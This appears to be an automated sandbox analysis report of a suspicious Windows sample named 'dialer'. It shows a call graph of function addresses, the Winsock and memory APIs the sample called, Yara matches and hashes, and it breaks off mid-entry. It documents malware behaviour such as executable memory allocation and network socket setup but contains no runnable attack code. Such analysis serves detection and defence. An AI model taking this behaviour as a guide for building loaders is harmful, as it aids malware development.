__cfltcvt 4 API calls 16316->16317 16316->16318 16317->16318 16318->16308 16320 53cf5f5 16319->16320 16321 53cf602 __cfltcvt 16319->16321 16322 53cf5fc 16320->16322 16323 53cf607 16320->16323 16321->16308 16324 53cf49d _mbstowcs_s free 16322->16324 16325 53cf63c memset 16323->16325 16326 53cf62a 16323->16326 16324->16321 16325->16321 16327 53cf4e6 __cfltcvt 2 API calls 16326->16327 16327->16321 16329 53d6c26 16328->16329 16331 53d6bb7 __cfltcvt _mbstowcs_s 16328->16331 16329->15766 16340 53d6c80 16329->16340 16331->16329 16333 53d6b1a 5 API calls 16331->16333 16334 53d6c2d 16331->16334 16369 53d1551 16331->16369 16377 53cfdc4 16331->16377 16333->16331 16381 53d0d02 16334->16381 16337 53d6b1a 5 API calls 16338 53d6c52 16337->16338 16338->16329 16438 53cfc47 16338->16438 16341 53d6c9d 16340->16341 16353 53d6c93 16340->16353 16342 53d6b1a 5 API calls 16341->16342 16343 53d6cad _mbstowcs_s 16342->16343 16344 53d6cc7 16343->16344 16345 53d6d10 16343->16345 16343->16353 16538 53d6da6 16344->16538 16346 53cf5df __cfltcvt 4 API calls 16345->16346 16348 53d6d0b 16346->16348 16352 53d0d02 7 API calls 16348->16352 16361 53d6d84 16348->16361 16350 53cf49d _mbstowcs_s free 16350->16353 16355 53d6d3a 16352->16355 16353->15764 16357 53d03e6 _mbstowcs_s 5 API calls 16355->16357 16358 53d6d66 __cfltcvt 16355->16358 16355->16361 16356 53d0c8e _mbstowcs_s 5 API calls 16356->16348 16359 53d6d53 16357->16359 16360 53cfc47 __cfltcvt memset 16358->16360 16358->16361 16359->16361 16362 53d0c8e _mbstowcs_s 5 API calls 16359->16362 16360->16361 16361->16350 16362->16358 16648 53d6971 16363->16648 16366 53d69be 16701 53d69df 16366->16701 16370 53d157c 16369->16370 16375 53d158f 16369->16375 16371 53cf49d _mbstowcs_s free 16370->16371 16373 53d1582 _mbstowcs_s 16371->16373 16372 53cf7eb __cfltcvt 3 API calls 16376 53d15a1 _mbstowcs_s 16372->16376 16374 53cf4e6 __cfltcvt 2 API calls 16373->16374 16374->16375 16375->16372 16375->16376 16376->16331 16378 53cfdea 16377->16378 16379 53cf7eb __cfltcvt 3 API calls 16378->16379 16380 53cfdf1 16378->16380 16379->16380 16380->16331 16380->16380 16382 53d0d19 __cfltcvt _mbstowcs_s 16381->16382 16383 53d0d67 memset 16382->16383 16404 53d1242 16382->16404 16384 53d0d81 _mbstowcs_s 16383->16384 16385 53cf4e6 __cfltcvt 2 API calls 16384->16385 16386 53d0dce 16385->16386 16387 53d11d5 16386->16387 16389 53cf4e6 __cfltcvt 2 API calls 16386->16389 16388 53d120a 16387->16388 16392 53cf49d _mbstowcs_s free 16387->16392 16391 53cf49d _mbstowcs_s free 16388->16391 16390 53d0de7 16389->16390 16390->16387 16394 53cf4e6 __cfltcvt 2 API calls 16390->16394 16393 53d1216 16391->16393 16392->16387 16395 53cf49d _mbstowcs_s free 16393->16395 16396 53d0e00 16394->16396 16397 53d121f 16395->16397 16396->16387 16399 53d0e26 16396->16399 16401 53cf5df __cfltcvt 4 API calls 16396->16401 16398 53cf49d _mbstowcs_s free 16397->16398 16400 53d1228 16398->16400 16399->16387 16403 53cf7eb __cfltcvt 3 API calls 16399->16403 16408 53d0e49 __cfltcvt _mbstowcs_s 16399->16408 16402 53cf49d _mbstowcs_s free 16400->16402 16400->16404 16401->16399 16402->16404 16405 53d0e5d 16403->16405 16404->16329 16404->16337 16405->16387 16441 53cfcdc 16405->16441 16408->16387 16410 53d0ed6 16408->16410 16411 53d0ec3 16408->16411 16413 53cf5df __cfltcvt 4 API calls 16410->16413 16412 53d0c8e _mbstowcs_s 5 API calls 16411->16412 16414 53d0ed1 16412->16414 16413->16414 16414->16387 16454 53d1285 16414->16454 16416 53d0f07 16416->16387 16417 53cf5df __cfltcvt 4 API calls 16416->16417 16418 53d0f20 16417->16418 16418->16387 16458 53d1379 16418->16458 16421 53cf4e6 __cfltcvt 2 API calls 16422 53d0f72 16421->16422 16422->16387 16423 53cf5df __cfltcvt 4 API calls 16422->16423 16432 53d0f8b 16423->16432 16424 53d1195 16427 53d1379 memset 16424->16427 16425 53d1137 16425->16387 16425->16424 16430 53d1285 memset 16425->16430 16426 53d1285 memset 16428 53d1048 16426->16428 16433 53d11aa 16427->16433 16428->16387 16428->16425 16428->16426 16429 53d1285 memset 16429->16432 16430->16425 16431 53cf4e6 __cfltcvt 2 API calls 16436 53d0fcc 16431->16436 16432->16387 16432->16429 16432->16436 16433->16387 16461 53d0298 16433->16461 16435 53cf5df __cfltcvt 4 API calls 16435->16436 16436->16387 16436->16428 16436->16431 16436->16435 16437 53d1285 memset 16436->16437 16437->16436 16439 53cfc5d memset 16438->16439 16440 53cfc76 16438->16440 16439->16440 16440->16329 16442 53cfcff _mbstowcs_s 16441->16442 16443 53cf4e6 __cfltcvt 2 API calls 16442->16443 16444 53cfd24 16442->16444 16443->16444 16444->16387 16445 53d0c8e 16444->16445 16446 53d0c9b __cfltcvt 16445->16446 16447 53d0ca1 16446->16447 16470 53d076b 16446->16470 16447->16408 16449 53d0cfc 16449->16408 16450 53d0cb9 __cfltcvt 16450->16449 16451 53d0298 __cfltcvt 4 API calls 16450->16451 16453 53d0cdc _mbstowcs_s 16450->16453 16451->16450 16452 53d02f6 _mbstowcs_s 4 API calls 16452->16453 16453->16449 16453->16452 16455 53d12a2 16454->16455 16457 53d12d3 __cfltcvt _mbstowcs_s 16454->16457 16456 53d12ad memset 16455->16456 16455->16457 16456->16457 16457->16416 16459 53d1285 memset 16458->16459 16460 53d0f3c 16459->16460 16460->16387 16460->16421 16460->16428 16462 53d02df 16461->16462 16463 53d02b1 __cfltcvt 16461->16463 16530 53d00cd 16462->16530 16465 53d02bc 16463->16465 16466 53d02c9 16463->16466 16522 53d01a1 16465->16522 16469 53d01a1 __cfltcvt 4 API calls 16466->16469 16467 53d02c7 16467->16387 16469->16467 16472 53d077f __cfltcvt _mbstowcs_s 16470->16472 16471 53d0785 16471->16450 16472->16471 16473 53d07cd 16472->16473 16474 53d0808 16472->16474 16476 53d07db 16473->16476 16478 53cf7eb __cfltcvt 3 API calls 16473->16478 16475 53cf5df __cfltcvt 4 API calls 16474->16475 16477 53d0812 16475->16477 16476->16471 16479 53d07f5 __cfltcvt 16476->16479 16480 53cf5df __cfltcvt 4 API calls 16476->16480 16477->16479 16482 53cf5df __cfltcvt 4 API calls 16477->16482 16478->16476 16479->16471 16481 53cf49d _mbstowcs_s free 16479->16481 16480->16479 16483 53d0c04 16481->16483 16484 53d082a 16482->16484 16485 53cf49d _mbstowcs_s free 16483->16485 16484->16479 16487 53cf4e6 __cfltcvt 2 API calls 16484->16487 16486 53d0c0d 16485->16486 16488 53cf49d _mbstowcs_s free 16486->16488 16489 53d084e 16487->16489 16490 53d0c16 16488->16490 16489->16479 16492 53cf7eb __cfltcvt 3 API calls 16489->16492 16491 53cf49d _mbstowcs_s free 16490->16491 16493 53d0c1f 16491->16493 16494 53d0864 16492->16494 16495 53cf49d _mbstowcs_s free 16493->16495 16494->16479 16496 53cf4e6 __cfltcvt 2 API calls 16494->16496 16495->16471 16497 53d087b 16496->16497 16497->16479 16498 53cf4e6 __cfltcvt 2 API calls 16497->16498 16499 53d0892 _mbstowcs_s 16498->16499 16499->16479 16500 53cfcdc _mbstowcs_s 2 API calls 16499->16500 16504 53d08d6 16499->16504 16502 53d08c0 16500->16502 16501 53cfcdc _mbstowcs_s 2 API calls 16510 53d090e _mbstowcs_s 16501->16510 16502->16479 16503 53cfcdc _mbstowcs_s 2 API calls 16502->16503 16503->16504 16504->16479 16504->16501 16505 53d0975 16506 53cfdc4 _mbstowcs_s 3 API calls 16505->16506 16516 53d097f __cfltcvt _mbstowcs_s 16506->16516 16507 53d02f6 _mbstowcs_s 4 API calls 16507->16510 16508 53d0b8d 16509 53d0b9e 16508->16509 16511 53cf5df __cfltcvt 4 API calls 16508->16511 16509->16479 16512 53cfdc4 _mbstowcs_s 3 API calls 16509->16512 16510->16479 16510->16505 16510->16507 16511->16509 16513 53d0bc6 16512->16513 16513->16479 16514 53cf5df __cfltcvt 4 API calls 16513->16514 16514->16479 16515 53cf7eb calloc free memset __cfltcvt 16515->16516 16516->16479 16516->16508 16516->16515 16517 53d073c 5 API calls _mbstowcs_s 16516->16517 16518 53d02f6 _mbstowcs_s 4 API calls 16516->16518 16519 53cf5df __cfltcvt 4 API calls 16516->16519 16520 53cfcdc calloc free _mbstowcs_s 16516->16520 16521 53d0298 __cfltcvt 4 API calls 16516->16521 16517->16516 16518->16516 16519->16516 16520->16516 16521->16516 16523 53d01b4 __cfltcvt _mbstowcs_s 16522->16523 16524 53d01dc 16523->16524 16525 53cf5df __cfltcvt 4 API calls 16523->16525 16529 53d01ba 16523->16529 16526 53cf5df __cfltcvt 4 API calls 16524->16526 16527 53d01f5 __cfltcvt 16524->16527 16525->16524 16526->16527 16528 53cf49d _mbstowcs_s free 16527->16528 16528->16529 16529->16467 16531 53d00dc 16530->16531 16532 53d00f0 16531->16532 16533 53cf5df __cfltcvt 4 API calls 16531->16533 16534 53cf4e6 __cfltcvt 2 API calls 16532->16534 16535 53d0199 16532->16535 16533->16532 16536 53d0126 16534->16536 16535->16467 16536->16535 16537 53cf4e6 __cfltcvt 2 API calls 16536->16537 16537->16536 16539 53d6dc1 _mbstowcs_s 16538->16539 16540 53d6dfc __cfltcvt 16539->16540 16541 53d6dc7 16539->16541 16544 53d6e0d 16540->16544 16556 53d6e64 __cfltcvt _mbstowcs_s 16540->16556 16542 53cf5df __cfltcvt 4 API calls 16541->16542 16543 53d6dce 16542->16543 16545 53d6cd3 16543->16545 16547 53cf7eb __cfltcvt 3 API calls 16543->16547 16546 53d03e6 _mbstowcs_s 5 API calls 16544->16546 16545->16361 16563 53d03e6 16545->16563 16548 53d6e15 16546->16548 16549 53d6de3 16547->16549 16548->16545 16551 53d0c8e _mbstowcs_s 5 API calls 16548->16551 16549->16545 16552 53cf7eb __cfltcvt 3 API calls 16549->16552 16550 53d1551 _mbstowcs_s 4 API calls 16550->16556 16553 53d6e2b 16551->16553 16552->16545 16553->16545 16554 53d03e6 _mbstowcs_s 5 API calls 16553->16554 16555 53d6e41 16554->16555 16555->16545 16557 53d0c8e _mbstowcs_s 5 API calls 16555->16557 16556->16545 16556->16550 16558 53cfdc4 _mbstowcs_s 3 API calls 16556->16558 16559 53d6ec2 16556->16559 16557->16545 16558->16556 16577 53d15cd 16559->16577 16562 53d0d02 7 API calls 16562->16545 16564 53d03f8 _mbstowcs_s 16563->16564 16565 53d0415 16564->16565 16566 53cf5df __cfltcvt 4 API calls 16564->16566 16567 53cf5df __cfltcvt 4 API calls 16565->16567 16570 53d043c 16565->16570 16576 53d04a0 _mbstowcs_s 16565->16576 16566->16565 16567->16570 16568 53cf4e6 __cfltcvt 2 API calls 16571 53d048e 16568->16571 16569 53cf49d _mbstowcs_s free 16572 53d04e7 16569->16572 16570->16568 16570->16576 16574 53cf7eb __cfltcvt 3 API calls 16571->16574 16571->16576 16573 53cf49d _mbstowcs_s free 16572->16573 16575 53d04f0 16573->16575 16574->16576 16575->16356 16575->16361 16576->16569 16578 53d15e0 __cfltcvt _mbstowcs_s 16577->16578 16608 53d15e6 16578->16608 16625 53d13ab 16578->16625 16580 53cf49d _mbstowcs_s free 16581 53d1997 16580->16581 16582 53cf49d _mbstowcs_s free 16581->16582 16585 53d19a0 16582->16585 16583 53d1650 __cfltcvt 16584 53d0c8e _mbstowcs_s 5 API calls 16583->16584 16624 53d166f 16583->16624 16587 53d1686 16584->16587 16586 53cf49d _mbstowcs_s free 16585->16586 16588 53d19a9 16586->16588 16589 53cf5df __cfltcvt 4 API calls 16587->16589 16587->16624 16590 53cf49d _mbstowcs_s free 16588->16590 16591 53d16a0 16589->16591 16592 53d19b2 16590->16592 16594 53cf5df __cfltcvt 4 API calls 16591->16594 16591->16624 16593 53cf49d _mbstowcs_s free 16592->16593 16595 53d19bb 16593->16595 16596 53d16b8 16594->16596 16597 53cf49d _mbstowcs_s free 16595->16597 16600 53cf5df __cfltcvt 4 API calls 16596->16600 16596->16624 16598 53d19c4 16597->16598 16599 53cf49d _mbstowcs_s free 16598->16599 16601 53d19cd 16599->16601 16602 53d16d0 16600->16602 16603 53cf49d _mbstowcs_s free 16601->16603 16605 53cf7eb __cfltcvt 3 API calls 16602->16605 16602->16624 16604 53d19d6 16603->16604 16606 53cf49d _mbstowcs_s free 16604->16606 16607 53d16e6 16605->16607 16606->16608 16609 53cf7eb __cfltcvt 3 API calls 16607->16609 16607->16624 16608->16545 16608->16562 16610 53d16fc 16609->16610 16611 53cf7eb __cfltcvt 3 API calls 16610->16611 16610->16624 16612 53d1712 16611->16612 16613 53cf7eb __cfltcvt 3 API calls 16612->16613 16612->16624 16614 53d1728 __cfltcvt _mbstowcs_s 16613->16614 16615 53d02f6 free calloc free memset _mbstowcs_s 16614->16615 16616 53d0298 free calloc free memset __cfltcvt 16614->16616 16617 53cfdc4 calloc free memset _mbstowcs_s 16614->16617 16618 53d1926 __cfltcvt 16614->16618 16614->16624 16615->16614 16616->16614 16617->16614 16619 53d0298 __cfltcvt 4 API calls 16618->16619 16620 53d1951 _mbstowcs_s 16618->16620 16618->16624 16619->16618 16621 53d197e 16620->16621 16623 53d02f6 _mbstowcs_s 4 API calls 16620->16623 16620->16624 16622 53cf5df __cfltcvt 4 API calls 16621->16622 16622->16624 16623->16620 16624->16580 16626 53d13bd _mbstowcs_s 16625->16626 16627 53cf5df __cfltcvt 4 API calls 16626->16627 16628 53d13db 16627->16628 16629 53d1528 16628->16629 16630 53cf5df __cfltcvt 4 API calls 16628->16630 16631 53cf49d _mbstowcs_s free 16629->16631 16637 53d13f4 _mbstowcs_s 16630->16637 16632 53d1535 16631->16632 16633 53cf49d _mbstowcs_s free 16632->16633 16634 53d153e 16633->16634 16635 53cf49d _mbstowcs_s free 16634->16635 16636 53d1547 16635->16636 16636->16583 16637->16629 16638 53cfdc4 _mbstowcs_s 3 API calls 16637->16638 16639 53d1426 16638->16639 16639->16629 16640 53cfdc4 _mbstowcs_s 3 API calls 16639->16640 16646 53d143c __cfltcvt _mbstowcs_s 16640->16646 16641 53d150a 16642 53cfcdc _mbstowcs_s 2 API calls 16641->16642 16643 53d1514 16642->16643 16643->16629 16645 53cf5df __cfltcvt 4 API calls 16643->16645 16644 53cfdc4 calloc free memset _mbstowcs_s 16644->16646 16645->16629 16646->16629 16646->16641 16646->16644 16647 53d01a1 free calloc free memset __cfltcvt 16646->16647 16647->16646 16649 53d6986 16648->16649 16650 53d696c 16648->16650 16654 53d6633 16649->16654 16650->15766 16650->16366 16661 53d6651 16654->16661 16657 53d8dec 16658 53d8df9 16657->16658 16659 53d8e00 16657->16659 16658->16650 16692 53d8c4e 16659->16692 16666 53db3f4 16661->16666 16664 53d664c 16664->16650 16664->16657 16667 53d6667 16666->16667 16669 53db417 _mbstowcs_s 16666->16669 16667->16664 16684 53d8e7d 16667->16684 16668 53d1551 _mbstowcs_s free calloc free memset 16668->16669 16669->16667 16669->16668 16670 53db4c4 __cfltcvt _mbstowcs_s 16669->16670 16672 53db449 _mbstowcs_s 16669->16672 16670->16667 16671 53d1551 _mbstowcs_s free calloc free memset 16670->16671 16673 53cfdc4 _mbstowcs_s calloc free memset 16670->16673 16671->16670 16674 53db469 16672->16674 16675 53db45a 16672->16675 16673->16670 16677 53cf860 _mbstowcs_s calloc free 16674->16677 16676 53cfdc4 _mbstowcs_s calloc free memset 16675->16676 16678 53db465 16676->16678 16677->16678 16678->16667 16679 53cf860 _mbstowcs_s calloc free 16678->16679 16680 53db48b 16679->16680 16680->16667 16681 53cf860 _mbstowcs_s calloc free 16680->16681 16682 53db4a3 16681->16682 16682->16667 16682->16670 16683 53cf860 _mbstowcs_s calloc free 16682->16683 16683->16670 16685 53d8e8d __cfltcvt 16684->16685 16686 53db0e4 __cfltcvt 5 API calls 16685->16686 16691 53d8ef3 16685->16691 16687 53d8e9c 16686->16687 16688 53d8ec8 16687->16688 16689 53da7fa __cfltcvt 5 API calls 16687->16689 16687->16691 16690 53d8ef9 __cfltcvt 12 API calls 16688->16690 16688->16691 16689->16688 16690->16691 16691->16664 16693 53d8c67 __cfltcvt 16692->16693 16694 53d8c9b 16693->16694 16695 53d8c6d 16693->16695 16697 53d8cd8 __cfltcvt 16693->16697 16694->16695 16696 53cfc47 __cfltcvt memset 16694->16696 16695->16658 16698 53d8cba 16696->16698 16697->16695 16700 53cfc47 __cfltcvt memset 16697->16700 16698->16695 16699 53cfc47 __cfltcvt memset 16698->16699 16699->16695 16700->16695 16702 53d69da 16701->16702 16703 53d69eb 16701->16703 16702->15764 16703->16702 16707 53d668d 16703->16707 16705 53d6a0f __cfltcvt 16705->16702 16706 53cfc47 __cfltcvt memset 16705->16706 16706->16702 16710 53d66ae 16707->16710 16711 53d66be __cfltcvt 16710->16711 16712 53d8e7d __cfltcvt 12 API calls 16711->16712 16715 53d66d9 __cfltcvt 16712->16715 16713 53d8aec __cfltcvt free 16714 53d66a9 16713->16714 16714->16705 16716 53cf5df __cfltcvt 4 API calls 16715->16716 16717 53d66f0 16715->16717 16716->16717 16717->16713 16719 53cef8e 2 API calls 16718->16719 16720 53ce536 16719->16720 16721 53ce523 16720->16721 16722 53cef4e free 16720->16722 16721->15668 16722->16721 16723 53c2b8f calloc 16724 53c2d2c 16723->16724 16725 53c2bb3 memset time srand calloc 16723->16725 16727 53c2d01 free 16725->16727 16729 53c2c19 16725->16729 16727->16724 16741 53c48ba 16729->16741 16731 53c2c3c strlen 16746 53c55e8 16731->16746 16733 53c2c52 16740 53c2ce1 16733->16740 16751 53c8ac2 16733->16751 16735 53c3c47 free 16736 53c2ced 16735->16736 16737 53c2cf5 free 16736->16737 16737->16727 16738 53c2c62 16754 53c8b5e 16738->16754 16740->16735 16762 53cf11a memset 16741->16762 16743 53c48d8 16763 53cf12e 16743->16763 16745 53c48e4 16745->16731 16747 53c55fe 16746->16747 16748 53c55f7 strlen 16746->16748 16767 53c5640 16747->16767 16748->16747 16750 53c560c 16750->16733 16752 53c8dfb 5 API calls 16751->16752 16753 53c8ad1 16752->16753 16753->16738 16757 53c8b69 16754->16757 16755 53c8b6e 16755->16740 16757->16755 16761 53c8b9e 16757->16761 16772 53c8ca1 16757->16772 16782 53c8e62 GetTickCount 16757->16782 16761->16755 16761->16757 16784 53c8c19 16761->16784 16788 53c8d93 16761->16788 16762->16743 16764 53cf13e 16763->16764 16765 53cf166 memset memset 16764->16765 16766 53cf1b7 16765->16766 16766->16745 16768 53c5674 16767->16768 16769 53c5651 memcmp 16767->16769 16770 53c5665 16768->16770 16771 53c5679 memcmp 16768->16771 16769->16768 16769->16770 16770->16750 16771->16770 16773 53c8d67 16772->16773 16774 53c8cb3 16772->16774 16773->16761 16774->16773 16776 53c8d02 16774->16776 16795 53ca983 16774->16795 16800 53ca53b 16774->16800 16813 53ca894 16774->16813 16820 53cbecb 16774->16820 16827 53cb89d 16774->16827 16776->16774 16807 53ca7b9 16776->16807 16783 53c8e71 16782->16783 16783->16757 16786 53c8c1e 16784->16786 16785 53c8c77 16785->16761 16786->16785 16877 53c984b 16786->16877 16789 53c8da9 GetQueuedCompletionStatus 16788->16789 16790 53c8da2 16788->16790 16792 53c8dd4 GetLastError 16789->16792 16794 53c8dc6 16789->16794 16894 53c9540 16790->16894 16792->16794 16794->16761 16796 53ca991 16795->16796 16797 53ca9c6 setsockopt 16796->16797 16799 53ca9e1 16796->16799 16798 53ca9ff WSAGetLastError 16797->16798 16797->16799 16798->16799 16799->16774 16802 53ca5ea 16800->16802 16805 53ca55b 16800->16805 16801 53ca628 WSARecv 16801->16802 16803 53ca6f2 WSAGetLastError 16801->16803 16802->16801 16806 53ca671 16802->16806 16803->16806 16804 53c9f64 8 API calls 16804->16805 16805->16774 16806->16804 16806->16805 16811 53ca7cf 16807->16811 16808 53ca80f 16810 53ca816 CloseHandle 16808->16810 16812 53ca81d 16808->16812 16809 53ca808 UnregisterWait 16809->16808 16810->16812 16811->16808 16811->16809 16811->16812 16812->16776 16814 53ca8f9 16813->16814 16819 53ca8a7 16813->16819 16815 53ca940 closesocket 16814->16815 16816 53ca903 setsockopt 16814->16816 16817 53ca953 16815->16817 16815->16819 16816->16815 16816->16819 16833 53c9ca2 socket 16817->16833 16819->16774 16821 53cbeea 16820->16821 16822 53cbfa0 memset WSARecvFrom 16821->16822 16826 53cbf06 16821->16826 16824 53cbff6 WSAGetLastError 16822->16824 16822->16826 16824->16826 16825 53cc08f 16825->16774 16826->16825 16849 53cbcf1 memset 16826->16849 16828 53cb8b7 16827->16828 16829 53cb8b0 16827->16829 16864 53cb9e5 16828->16864 16860 53cb8c1 16829->16860 16832 53cb8b5 16832->16774 16834 53c9d04 SetHandleInformation 16833->16834 16848 53c9cdc 16833->16848 16835 53c9d4f memset 16834->16835 16839 53c9d13 16834->16839 16836 53c9d6c 16835->16836 16837 53c9d9c 16836->16837 16838 53c9dbb GetLastError 16836->16838 16844 53c9e38 RegisterWaitForSingleObject 16837->16844 16837->16848 16838->16837 16840 53c9dc8 WSAGetLastError 16838->16840 16845 53c9d3e closesocket 16839->16845 16841 53c9dda WSAGetLastError 16840->16841 16842 53c9dd2 WSAGetLastError 16840->16842 16843 53c9dea 16841->16843 16842->16843 16846 53c9df6 closesocket 16843->16846 16844->16848 16845->16848 16847 53c9e09 CloseHandle 16846->16847 16846->16848 16847->16848 16848->16819 16850 53cbdee 16849->16850 16851 53cbd22 memset 16849->16851 16853 53cbe43 GetLastError 16850->16853 16859 53cbd84 16850->16859 16855 53cbd80 16851->16855 16854 53cbe50 WSAGetLastError 16853->16854 16853->16859 16856 53cbe5a WSAGetLastError 16854->16856 16857 53cbe62 WSAGetLastError 16854->16857 16858 53cbdb6 GetLastError 16855->16858 16855->16859 16856->16859 16857->16859 16858->16859 16859->16825 16861 53cb8d6 16860->16861 16863 53cb9bb 16861->16863 16868 53cb629 16861->16868 16863->16832 16865 53cb9fa 16864->16865 16867 53cba96 16865->16867 16873 53cb721 16865->16873 16867->16832 16869 53cb642 memset 16868->16869 16871 53cb2a0 7 API calls 16869->16871 16872 53cb6e5 16871->16872 16872->16863 16874 53cb737 QueueUserWorkItem 16873->16874 16876 53cb792 16874->16876 16876->16867 16878 53c9864 16877->16878 16879 53c992f 16877->16879 16878->16879 16881 53c9878 16878->16881 16880 53c994b closesocket 16879->16880 16888 53c9957 16879->16888 16890 53c98b5 16879->16890 16880->16888 16882 53c98c2 shutdown 16881->16882 16881->16890 16883 53c98d8 WSAGetLastError 16882->16883 16882->16890 16883->16890 16884 53c99dd 16886 53c99fe 16884->16886 16887 53c99f3 UnregisterWait 16884->16887 16884->16890 16885 53c99d0 free 16885->16884 16889 53c9a05 CloseHandle 16886->16889 16886->16890 16887->16886 16888->16884 16888->16885 16891 53c9992 UnregisterWait 16888->16891 16892 53c99ac CloseHandle 16888->16892 16893 53c99ce 16888->16893 16889->16890 16890->16786 16891->16888 16892->16888 16893->16885 16895 53c9551 16894->16895 16896 53c8e62 GetTickCount 16895->16896 16897 53c8da8 16895->16897 16896->16897 16897->16789 16898 53c44f8 16899 53c43a6 7 API calls 16898->16899 16900 53c4515 16899->16900 17047 53c8dfb 17048 53c8e04 17047->17048 17049 53c8e0e 17047->17049 17050 53c8e11 5 API calls 17048->17050 17050->17049

                                                                                Executed Functions

                                                                                Function 053C9F64 Relevance: 12.1, APIs: 8, Instructions: 122networkregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 053C9F7B
                                                                                • memset.MSVCRT ref: 053C9FC7
                                                                                • WSARecv.WS2_32(FFE0458D,00000000,00000001,?,00000000,053C21F9,00000000), ref: 053C9FF5
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 053CA01F
                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 053CA02C
                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 053CA036
                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 053CA03E
                                                                                • RegisterWaitForSingleObject.KERNEL32(053C2219,30C48300,053C9EAD,053C21E9,000000FF,00000004), ref: 053CA088
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2020750497-0
                                                                                • Opcode ID: 34458d1a3015dc83604c7ebef42cae1ca68275a6e10826622ca14d66477db249
                                                                                • Instruction ID: cb46a719875bf3da871633f3a21b20384a3a9793ac15f8872eb3cf248e345ab6
                                                                                • Opcode Fuzzy Hash: 34458d1a3015dc83604c7ebef42cae1ca68275a6e10826622ca14d66477db249
                                                                                • Instruction Fuzzy Hash: 82419D32500618AFD721DF24D849BAABFF8FF05354F104669F942DA5D0DBB0EA04CB91
                                                                                Function 053C9A57 Relevance: 10.6, APIs: 7, Instructions: 64networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • socket.WS2_32(00000010,00000001,00000000), ref: 053C9A6C
                                                                                • WSAGetLastError.WS2_32(?,?,?,053C9A53,053CAD04,00000002,053CAD04,00000010,053CAD04,053CAD81), ref: 053C9A79
                                                                                  • Part of subcall function 053C9B02: ioctlsocket.WS2_32(053CAD04,8004667E,053CAD81), ref: 053C9B1D
                                                                                  • Part of subcall function 053C9B02: WSAGetLastError.WS2_32(?,?,053C9AC7,17E80870,053CAD04,00000000,00000010,00000000,?,?,?,053C9A53,053CAD04,00000002,053CAD04,00000010), ref: 053C9B28
                                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,053C9A53,053CAD04,00000002,053CAD04,00000010,053CAD04,053CAD81), ref: 053C9A94
                                                                                • GetLastError.KERNEL32(?,?,?,053C9A53,053CAD04,00000002,053CAD04,00000010,053CAD04,053CAD81), ref: 053C9A9E
                                                                                • closesocket.WS2_32(00000000), ref: 053C9AB0
                                                                                • bind.WS2_32(50A5A5A5,053CAD04,00000002), ref: 053C9AD7
                                                                                • WSAGetLastError.WS2_32(?,?,?,053C9A53,053CAD04,00000002,053CAD04,00000010,053CAD04,053CAD81), ref: 053C9AE2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
                                                                                • String ID:
                                                                                • API String ID: 2417539845-0
                                                                                • Opcode ID: ccc978a44cd0326c8c98ec4cd4999d824773dc29f06fcbd3f109df09005c0f5e
                                                                                • Instruction ID: 34f711a45de49939040b2f341dfd9c366c219a3179cdd1a66b2e172c2d0e6af5
                                                                                • Opcode Fuzzy Hash: ccc978a44cd0326c8c98ec4cd4999d824773dc29f06fcbd3f109df09005c0f5e
                                                                                • Instruction Fuzzy Hash: A111B236114600ABDB325F74DC0DF6A7FAABF45730F11465CF622891E0DB71AC509B20
                                                                                Function 02CA02D4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167memoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02CA031C
                                                                                  • Part of subcall function 02CA00A0: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02CA00C9
                                                                                  • Part of subcall function 02CA00A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02CA0275
                                                                                • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02CA036E
                                                                                • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 02CA03DD
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02CA03FD
                                                                                • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02CA0424
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CA044C
                                                                                • CloseHandle.KERNELBASE(?), ref: 02CA0467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000003.1761987159.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_3_2ca0000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                • String ID: ,
                                                                                • API String ID: 3867569247-3772416878
                                                                                • Opcode ID: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                                                                                • Instruction ID: 63325b685b726b9036fbd2aa3999c4769f3411fb0a3e40ccac00fb0964ad8d6f
                                                                                • Opcode Fuzzy Hash: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                                                                                • Instruction Fuzzy Hash: 7251EEB5900609EFCB10DFA5C894BDEBBB9FF48398F108529F959A7240D770AA44CF60
                                                                                Function 053C8AAD Relevance: 13.6, APIs: 9, Instructions: 99networkCOMMON
                                                                                Download Yara Rule

